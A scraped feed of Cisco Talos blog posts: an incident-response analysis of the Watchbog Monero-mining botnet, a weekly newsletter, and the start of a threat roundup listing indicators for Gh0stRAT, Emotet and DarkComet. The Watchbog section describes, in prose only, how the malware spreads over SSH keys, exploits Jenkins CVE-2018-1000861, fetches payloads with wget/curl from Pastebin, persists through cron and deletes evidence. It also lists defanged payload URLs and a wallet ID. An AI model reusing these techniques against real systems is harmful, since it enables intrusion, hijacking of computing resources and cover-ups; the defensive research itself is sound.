Quantcast
Channel: Cisco Talos Blog
Viewing all 1927 articles
Browse latest View live

Watchbog and the Importance of Patching

$
0
0

What Happened?


Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog cryptomining botnet. The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.

This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker's intentions and abilities on a customer's network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts.

There were some attempts at obfuscation, such as base64 encoding URLs and Pastebins, but the attack was still relatively simple to uncover - this attacker did not practice particularly strong operational security.

The attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any "real" hackers could do so. During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the "positive" intentions of this adversary. Below is a message left on a compromised system by the adversary:




What does Watchbog do?


The Watchbog botnet mines Monero cryptocurrency for its owners. While researching our variant we came across a post by Alibaba Cloud Security that provides some insights into Watchbog. This post coincided with our findings as we found an installation script that performs the following activities.

First the installation script checks for running processes matching other cryptocurrency miners. If the system was previously configured to mine cryptocurrency, the installation script would terminate their execution using the kill command:




The script then uses the touch command to determine its capability to write to various directories on the filesystem.




It also checks the architecture of the system to determine if it is executing on a 32-bit or 64-bit operating system and then makes three attempts to download and install a 'kerberods' dropper using wget or curl.



Depending on permissions, the kerberods dropper is saved to one of the following directories:

  • The current working directory
  • /usr/bin
  • /usr/libexec
  • /usr/local/bin
  • /tmp
  • /usr/sbin


The script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information. CSIRS verified this as the same wallet ID as the one used by the attacker referenced in the Alibaba cloud post referenced earlier.



Though the Pastebin URL in the previous screenshot is no longer accessible, the next step in the infection process is to download the cryptocurrency miner. We identified a script that 'kerberods' likely runs to reach out to GitHub to install the XMR-Stak Monero miner.

The main part of the script checks to see if a process called 'watchbog' is running.



If the 'watchbog' process is not detected, the 'testa' or 'download' functions are called to install the version of the miner that's compatible with the host operating system and architecture and execute it to begin the mining process.



'Testa' function


As previously mentioned, the 'testa' function may be called to facilitate the infection process. Below is the code associated with this function. This code is responsible for writing the various configuration data used by the mining software. The function declares three variables and assigns base64 encoded data to each of them.



The base64 encoded data is then decoded and written to various files.



The base64 encoded values correspond to the following:

  • St_64: This variable contains the URL of the Github repository that hosts the XMR-Stak mining client.
  • hXXps://github[.]com/fireice-uk/xmr-stak/releases/download/2.10.3/xmr-stak-linux-2.10.3-cpu.tar.xz


  • con_url: This variable contains the Pastebin URL that is used to host the configuration file for the mining client.
  • hXXps://pastebin[.]com/raw/YJH8sWr


  • Cpu_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.
  • hXXps://pastebin[.]com/raw/irzk5mSh


  • poo_url:This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.
  • hXXps://pastebin[.]com/raw/aJkbTx6Y


The script then starts the Watchbog process and deletes the text file after downloading the encoded Pastebins as a text file and giving it execution permissions. The following screenshot shows the configuration file that is referenced by the con_url variable in the 'testa' function.



'download' function


The following code is associated with the 'download' function referenced by the installation script previously described. Similar to what was described in the 'testa' function, it contains three declared variables with base64 encoded assignments.



These base64 encoded strings correspond to the following:

  • mi_64: This variable contains the Github URL that hosts the XMrig monero mining client.
  • hXXps://github[.]com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz


  • mi_32: This variable contains a Pixeldrain URL. During our investigation the URL was no longer accessible.
  • hXXps://pixeldrain[.]com/api/file/ZuVWceWG


  • der_ke: This variable contains a Pastebin URL. The URL was used to host a file containing the attacker(s) Monero Wallet ID for the miner to use. This Wallet ID is used to facilitate payment to the attacker. All Monero successfully mined by clients under the attacker's control will transfer the Monero to the Wallet ID specified in this file. The same wallet is included in the Alibaba Cloud post mentioned earlier.
  • hXXps://pastebin[.]com/raw/hURdMBLd


The download function then writes the contents retrieved from the specified URLs to various file locations. It then determines the architecture of the system and installs the appropriate mining client and executes it to initiate the mining process.




The following screenshot contains the contents of the Monero wallet configuration associated with the der_ke variable in the 'download' function described earlier. It specifies the configuration parameters that will be used by the mining client, including the Wallet ID, mining pool URL, and other parameters that can be used to control CPU usage, logging, etc.



Lateral movement via SSH


CSIRS identified that the adversary was using SSH to spread laterally. Although local logs were unavailable, we were able to use network logs to gain an understanding of how the malware was spreading. As we viewed the logs, it was easy to determine Watchbog's lateral movement mechanism because they were generating a large amount of SSH traffic. This could have been easily detected using internal traffic flow monitoring, such as with StealthWatch Cloud or other netflow-monitoring capability.

The following Bash script was used to facilitate the lateral movement process. It retrieves the contents of the known_hosts file on the infected system and then attempts to SSH into those systems. It also checks for the existence of SSH keys and leverages them to authenticate to the systems in the known_hosts file. If successful, it will retrieve the contents of the Pastebin URL previously described and initiate the infection process.




Lateral movement via Jenkins and Redis servers


In addition to leveraging SSH for lateral movement, the Watchbog adversary also attempted to leverage a Python script that scans for open Jenkins and Redis ports on the host's subnet. If the script finds any vulnerable servers, it attempts to use the curl or wget commands to retrieve a payload from Pastebin and execute it on the target.

Based on the following string on line 71, the script targets CVE-2018-1000861, a vulnerability in the Staple web framework for versions up to Jenkins 2.138.1 or 2.145 which handles HTTP requests. It can provide attackers with RCE through particularly crafted URLs. A post by Orange Tsai shows how to exploit this vulnerability by using cross reference objects to bypass ACL policy.



Though the pastes accessed in the script were no longer available, we believe the payload was the installation script for the XMR-Stak miner previously described. The following Python script is also downloaded and executed from the XMR-Stak miner script described above in a function called 'party.'



As can be seen above, the payload variable contains a base64 encoded blob which is then decoded and written to the /tmp directory and executes it. This base64 encoded blob contains a Pastebin URL (hXXps://pastebin[.]com/raw/DzgYb9mu) which was used to host the following Python script. The Python script is used to facilitate the exploitation of the aforementioned vulnerability and initiate the infection process. The following screenshots are associated with this Python script.







Persistence


Watchbog's main persistence mechanism appears to have been using cron jobs. Below is the 'system' function from the 'kerberods' installation script which ensures the dropper will call out to Pastebins every hour for new information. The below screenshot shows the way that Watchbog configures the cron jobs responsible for achieving persistence on infected systems.



In a post by Renato Marinho from Morphus Labs, he mentions a very interesting way 'kerberods' achieves persistence as well. If it has root privileges, it will download and load a library into the operating system which hooks parts of Glibc to modify Glibc's behavior. The post also specifies that the hooks allow the miner to run as anyone (including root) and also obfuscates the network connection to the mining pool as well as the Redis/Jenkins server scans.

Covering their tracks


Evidence deletion has been identified in previous Watchbog variants. The Watchbog variant in our incident continued this trend. Evidence deletion was performed in a clear manner with files and logs being deleted or overwritten. The evidence deletion was typically added to the end of a handful of the Pastebin scripts, with the Xmr-stak download and the SSH Lateral Movement scripts being prime examples. The loss of those key pieces of evidence made analysis difficult, but not impossible. We were able to rely upon our clients centralized logging to fill in those holes, and the hosts themselves still had evidence. The most obvious being the malware variants themselves.

Conclusion


Unpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed. Once that foothold has been established, the attacker can then connect to their C2, achieve persistent long-term access to the environment and spread laterally — which is exactly what happened in this case. The best way to prevent such activity would be to ensure that all enterprise web applications are up to date. Patching can cause some operational gaps and delays, so it’s also important to have a maintenance window and a test environment to ensure that the new patches do not cause any issues. Identifying cryptomining activity can be done effectively by following security fundamentals. Establish a baseline for internal network traffic and if any significant deviations occur, identify and investigate them. Even if there is an existing theory for the activity. In this case, Watchbog generated a noticeable spike in the organization’s SSH traffic.

Coverage

Intrusion prevention systems such as SNORT® provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

Additional ways our customers can detect and block these threats are listed below.



Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)


The following IOCs have been observed associated with Watchbog.

Hashes (SHA256):


b383d0fdfa5036ccfa5d9c2b43cbfd814bce8778978873057b86678e5295fc61 0b0567c9b45ea0a3ea4267001f0760ccdf2b8224fceaf8979d32fcceb2d6fb7a

3A6271A90D0F6CC8A2D31D45D931E8401F13F7377932BA07D871DC42F252B9CA

Domains:


aziplcr72qjhzvin[.]onion[.]to

Misc:


Monero Wallet (Same wallet as the Alibaba Cloud Post)

47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7


Threat Source newsletter (Sept. 12, 2019)

$
0
0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

You’ve heard it a million times: Always patch. But in case you needed another example that it’s important, Cisco Incident Response took a deep dive into a recent wave of Watchbog infections they observed. In this post, IR breaks down why this infection occurred, and what you can learn from it. 

Speaking of patching, it’s as good of a time as any to update all of your Microsoft products. The company released its latest security update as part of their monthly Patch Tuesday. Check out our breakdown of the most important vulnerabilities here and our Snort coverage here.

Ever considered an “illustrious career in cybercrime?” Well, don’t do it. So says Craig on the latest Beers with Talos podcast where the guys talking about “hacking back” and Matt’s level of Twitter fame.

We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.


Upcoming public engagements with Talos

Event: “DNS on Fire” at Virus Bulletin 2019
Location: Novotel London West hotel, London, U.K.
Date: Oct. 2 - 4
Speaker: Warren Mercer and Paul Rascagneres
Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

  • Some states’ departments of motor vehicles are selling driver’s license data to private companies, including private investigators. Many individuals registering for licenses do not read data agreements that allow states to turn around and sell their personal information. 
  • Some Chromebooks mistakenly alerted users that the devices were reaching their end-of-life. A small number of brand new devices, after a reboot, told the user to upgrade to newer hardware to receive the latest security update. Google has since fixed this bug. 
  • A new report outlines the first recorded cyber attack on the U.S. power grid. North American Electric Reliability Corp. says it lost visibility into a small portion of its grid due to a “cyber event” in March. 
  • The popular Wikipedia site went down across Europe and the Middle East due to a series of denial-of-service attacks. The actor behind the DDoS kept up their efforts for about three days. 
  • The U.S. filed criminal charges against a professor in Texas for allegedly stealing information on behalf of Chinese tech company Huawei. The same person had already been named in a civil suit surrounding these claims. 
  • Apple’s reputation as having the most secure mobile operating system has taken a hit over the past few weeks due to multiple vulnerabilities being disclosed. Security researchers say the company may have put too much faith into its own code in iOS and the Safari web browser.  
  • New emails show that the U.S. Drug Enforcement Agency was close to purchasing malware from Israel’s controversial NSO group. But the agreement was eventually called off due to the high cost. 
  • UNICEF, a well-known non-profit organization, mistakenly leaked the personal data of more than 8,000 users who had accessed its online portal. The non-profit sent the information in an email to 20,000 users, after which they disabled the portal for a short time. 
  • A now-closed payroll processing firm withdrew millions of dollars from some New Yorkers’ bank accounts — and the CEO is nowhere to be found. MyPayrollHR alerted customers two weeks ago that it would be shutting down, and this week took back a month’s worth of pay from employees who worked for those customers. 

Notable recent security issues

Title: Microsoft patches 19 critical bugs as part of security update  
Description: Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 85 vulnerabilities, 19 of which are rated “critical," 65 that are considered "important" and one "moderate." There is also a critical advisory relating to the latest update to Adobe Flash Player. This month’s security update covers security issues in a variety of Microsoft services and software, including the Jet Database Engine and the Hyper-V hypervisor.
Snort SIDs: 51436 - 51438, 51445, 51446, 51449 - 51452, 51454 - 51457, 51463 - 51465, 51479 – 51483

Title:Some NETGEAR routers vulnerable to DoS attacks  
Description: The NETGEAR N300 line of wireless routers contains two denial-of-service vulnerabilities. The N300 is a small and affordable wireless router that contains the basic features of a wireless router. An attacker could exploit these bugs by sending specific SOAP and HTTP requests to different functions of the router, causing it to crash entirely. 
Snort SIDs: 50040 (Written by Dave McDaniel)

Most prevalent malware files this week

SHA 256: 15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13 
MD5: c24315b0585b852110977dacafe6c8c1
Typical Filename: puls.exe
Claimed Product: N/A
Detection Name: W32.DoublePulsar:WNCryLdrA.22is.1201 

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: xme64-2141.exe
Claimed Product: N/A 
Detection Name: W32.7ACF71AFA8-95.SBX.TG

SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
MD5: db69eaaea4d49703f161c81e6fdd036f
Typical Filename: xme32-2141-gcc.exe
Claimed Product: N/A
Detection Name: W32.46B241E3D3-95.SBX.TG

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3 
MD5: 47b97de62ae8b2b927542aa5d7f3c858 
Typical Filename: qmreportupload
Claimed Product: qmreportupload.exe
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
Typical Filename: sayext.gif
Claimed Product: N/A
Detection Name: W32.093CC39350-100.SBX.TG 

Threat Roundup for September 6 to September 13

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 6 and Sept. 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
The most prevalent threats highlighted in this roundup are:
Threat NameTypeDescription
Win.Dropper.Gh0stRAT-7155936-0 Dropper Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Doc.Downloader.Emotet-7155084-0 Downloader Emotet is a banking trojan that remains relevant due to its ability to evolve and bypass antivirus products. It is commonly spread via malicious email attachments and links.
Win.Dropper.DarkComet-7154925-1 Dropper DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Virus.Expiro-7153559-0 Virus Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Ransomware.Shade-7158472-0 Ransomware Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments.
Win.Packed.Tofsee-7150793-1 Packed Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.

Threat Breakdown

Win.Dropper.Gh0stRAT-7155936-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS
Value Name: Version
24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS
Value Name: Group
24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Lostlove_K
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
Value Name: DisplayName
1
MutexesOccurrences
127.0.0.16
Global\f75b8341-d3d4-11e9-a007-00501e3ae7b54
k.ru9999.cc3
45.114.11.1372
www.ddostmd.com2
www.3rbb.com2
116.31.125.1471
www.baidu.com1
www.hkdcr.com1
xiaoyuer3001.f3322.net1
222.186.30.2111
192.168.1.1071
mm.zhangfanfan.com1
shenxian2016.f3322.net1
admin860129.f3322.net1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
45[.]114[.]11[.]1372
154[.]210[.]146[.]1382
116[.]31[.]125[.]1471
61[.]147[.]103[.]671
222[.]186[.]30[.]2111
23[.]238[.]148[.]741
221[.]217[.]66[.]1221
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
k[.]ru9999[.]cc3
www[.]3rbb[.]com2
WWW[.]DDOSTMD[.]COM2
WWW[.]HKDCR[.]COM1
xiaoyuer3001[.]f3322[.]net1
mm[.]zhangfanfan[.]com1
shenxian2016[.]f3322[.]net1
admin860129[.]f3322[.]net1
Files and or directories createdOccurrences
%ProgramFiles%\svchost.exe4

File Hashes

121441b204dbf7a02c8f4357452c99592ab9bdeb676089ccf1f24071f740251b 130abeb252c2a663ae691271f5d154722468d1b1b2ed23ef89d4fb9290fe081b 1326c0b36ad655c1653ce78e98204260ec8b9bddefa3cd8d2c620fab88b1a83c 25effefec15971bbe5714e37fd1f0e0e33298c691b61d04ed3af1b1359731a2b 287fcc0ae4a50e34215cfd084570d7b94ab4a3786b7260ad0b1167d1baa1a8b0 29a7a1457008f729066e21c378ea7c402fac80aa64619631565fb95a4d137652 2eb388113d650745686345acf88d32a44975e00764034875bd990aa5a80119ca 2f6d822e2ebeb0f94368b55c7c94a4f8a8b73b32214fe1f3fc5277da52411bf9 332a58814dc69a08873cc8bcbf3f8b8999dd2e7ea60ad47b635a7f735e3e85a5 47bac35158a06f748621847c0de60eab92db067f0cb95f798f0b342f508f1360 4805d4e36186da1bca0b0debf28a36ff772885f0b438d3924059ef3b9531b2ca 4de97329b8242136094b16a705fa15d3a4fe918d68b1f4f698b58ba1bcb16706 4ec20ea729ca18bed34a0dbcd2b65f049d0926ab9f94a5470bb24e600e771281 592ebcaa26bacc775420398933a0a9d63acdaa604f85805a3a3196d5a1a798ee 5f2336bb4321161e7115e63d08db836ef28be2df0cad4db9e6ce45ad3830c560 5f469e2248ae56e1077c2c87a1a15c2414352a94786845d3b65447d3ee23694d 626d4dc26ff7ec588635ad32e71fabeb8ad96887d24498ffa08a031e1e6a6bee 66db565cad627dde60e4f396ef1712f06d7b911670189ab21b870ecaada99531 681539e7da26b1130fdb65c581f5146067a51c3a42849874d6f7aa189209a754 682cf9935d0d19815becc05f3f1ed6931396f25ccf95b6deedf70a4ba94ba031 70d32abf71be74690a04ebfe9713e2287106964e46069612f37f4b0822dd8169 7b32dce1d5818551afd3efdbc3ba540c47b37942d12254fc26f16b5e3f50b96e 81f4af297381141ed4990b4837b0fb60385f29405b04df3a55d8953237aa1182 84df0240ad79f34c7172b8262ec0898e794d2448e43b1e0a577704c0b8ef40e5 8ec17725347ae019a5d5d00345ba283483797e8477bd23e98f59d8c6f3d37811
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Doc.Downloader.Emotet-7155084-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
14
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
192[.]185[.]157[.]19114
152[.]160[.]245[.]714
104[.]27[.]137[.]4812
104[.]27[.]136[.]4812
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]w[.]org14
www[.]testrent[.]com14
lackify[.]com14
www[.]loris[.]al14
financialdiscourse[.]com14
fiberoptictestrentals[.]net14
INDHRIGROUP[.]COM14
loris[.]al14
testrent[.]com14
Files and or directories createdOccurrences
%LOCALAPPDATA%\Microsoft\Schemas\MS Word_restart.xml14
%HOMEPATH%\490.exe14

File Hashes

1157bbcfa2438b4142bc1dc163952714ef2e084cd27698f5c2f78193367f8033 3eaba85e842d0ed0489d430cb1bc37d1fca702845ba478a0e290115bebfd8827 64732ab1f700b865a24a0fe06e94a54a40724568af5381afd126096b59f18606 8ef79e33fc1ebf640f78cebe13485489f85caf08fbf4cee696aadb977f21d6e7 96ab8b7fc0b45cf2fc1277ad938ad4aabb1bcc157f0259e456b76f1684e4896e c177de169b84382b1809efd361d8e5a6ee6eff262f479724856686d03c6bb6db c707b20c85d03595b74a56768d69786c33076030059260a6684df7ac7b3a9562 cd75eda017abff329abfa5162be02c8042c86730dd948a6b423d3ebce5f5e3b8 e09474de88f323075c3ef4ba54c458e3275ee102b72a2bfc4894e79a9703c542 e192e2125ef244cff6787b3cba927d3e047fbd5d54dffd66d885a8c1789f2cde e79e52b33e81b6d039817aa3cf87726db6de496fcb36477f29483a5730dd2874 f256396752c6a4164b4097d493b202de43fb8f8d7bba372dcd7ba45ba3edfd16 f54ad758e4ee395a12956b665b611ad69b622e672d9f4086e8754f4b301cfb04 f679763abeea019bdfdc22e23d9be3159ca1f325453f34e94954bee50176664c

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Dropper.DarkComet-7154925-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\DC3_FEXEC 5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{1Q4U2W04-714Q-L506-NR3K-B4MJ85W6X717} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{1Q4U2W04-714Q-L506-NR3K-B4MJ85W6X717}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{7F0I7VXB-063R-XLLO-731N-3EGO8NDEDVOR} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{7F0I7VXB-063R-XLLO-731N-3EGO8NDEDVOR}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6C5V5081-L886-C7EB-2J6N-054ATGC34D64} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6C5V5081-L886-C7EB-2J6N-054ATGC34D64}
Value Name: StubPath
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: System
1
<HKCU>\SOFTWARE\TGB61 1
<HKCU>\SOFTWARE\TGB61
Value Name: FirstExecution
1
<HKCU>\SOFTWARE\TGB61
Value Name: NewIdentification
1
MutexesOccurrences
DC_MUTEX-F3XDA2D5
_x_X_BLOCKMOUSE_X_x_4
_x_X_PASSWORDLIST_X_x_4
_x_X_UPDATE_X_x_4
DCPERSFWBP3
***MUTEX***2
***MUTEX***_SAIR2
054ATGC34D641
\BaseNamedObjects\054ATGC34D64_SAIR1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
193[.]161[.]193[.]992
92[.]44[.]166[.]321
81[.]214[.]120[.]2141
88[.]229[.]213[.]1181
176[.]219[.]165[.]91
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
hackroot00[.]ddns[.]net1
berkeaksoy-45595[.]portmap[.]host1
metin2ci[.]duckdns[.]org1
toxicwithahmet[.]duckdns[.]org1
denememusareis[.]duckdns[.]org1
blackhamdsnh[.]duckdns[.]org1
bluejeans067-51471[.]portmap[.]io1
Files and or directories createdOccurrences
%APPDATA%\dclogs5
